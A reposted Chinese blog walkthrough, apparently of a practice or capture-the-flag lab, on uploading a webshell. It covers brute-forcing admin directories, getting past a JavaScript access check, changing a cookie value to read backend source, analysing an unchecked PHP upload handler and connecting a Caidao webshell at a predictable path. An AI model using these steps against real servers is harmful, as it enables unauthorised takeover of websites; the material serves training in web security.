? ??? ? ? ? 由于最近比較忙，暫時(shí)沒有時(shí)間更新，所以分享分享一些其他博主文章，大家敬請(qǐng)諒解

摘要：?dirbuster掃描目錄發(fā)現(xiàn)幾個(gè)有用的東東/admin/upload.php/admin/upload1.php/admin/upload2.php訪問(wèn)的時(shí)候最后都會(huì)跳轉(zhuǎn)到/admin/upload...

dirbuster掃描目錄發(fā)現(xiàn)幾個(gè)有用的東東

/admin/upload.php

/admin/upload1.php

/admin/upload2.php

訪問(wèn)的時(shí)候最后都會(huì)跳轉(zhuǎn)到/admin/upload2.php?前端沒任何東西

但是/admin/upload1.php會(huì)有一個(gè)彈窗，查看一下前端代碼

view-source:http://219.153.49.228:43799/admin/upload1.php

會(huì)發(fā)現(xiàn)

Markup

<script language=javascript>alert('您無(wú)權(quán)限訪問(wèn)!');window.open('upload2.php','_top');script>
<form enctype="multipart/form-data" action="upload_file.php" method="post">
Send this file: <input name="filename" type="file">
<input type="hidden" name="verify" value="f8fc6604c7150e1d"/>
<input type="submit" value="Send File">
form>

第一行調(diào)用了javascript，我們?cè)跒g覽器里把JavaScript禁用就能正常訪問(wèn)了

而且這里有個(gè)亮眼的點(diǎn)

先抓一下訪問(wèn)包，再抓一下上傳包

可以看到，upload_file.php是用來(lái)處理數(shù)據(jù)的，upload1.php我猜測(cè)是來(lái)生成cookie的它讀取服務(wù)器上的一個(gè)txt文件，這里很有可能存在文件包含漏洞

嘗試一下把uploadmd5的值改為upload_file.php

讀取一下后端代碼?

對(duì)這段代碼進(jìn)行分析

PHP

<?php
$path="uploadfile/";//上傳路徑
$verify=$_POST["verify"];//接收verify參數(shù)
$time=date("Ymd");//取當(dāng)前日期，今天是20200515
if($_FILES["filename"]["name"])
{
$file1=$_FILES["filename"]["name"];//取上傳文件名
$file2 = $path.$time.'_'.$verify.'_'.$file1; //拼接字符串，分析一下大概就是/uploadfile/20200515_f8fc6604c7150e1d_shell.php
$flag=1;
}
if($flag) $result=move_uploaded_file($_FILES["filename"]["tmp_name"],$file2);
if($result) echo "上傳成功!";

?>

菜刀鏈接即可

PHP

http://219.153.49.228:43799/admin/uploadfile/20200515_f8fc6604c7150e1d_shell.php?a=1Q2W3E

總結(jié)

以上是生活随笔為你收集整理的取文件 shell_webshell文件上传分析溯源的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。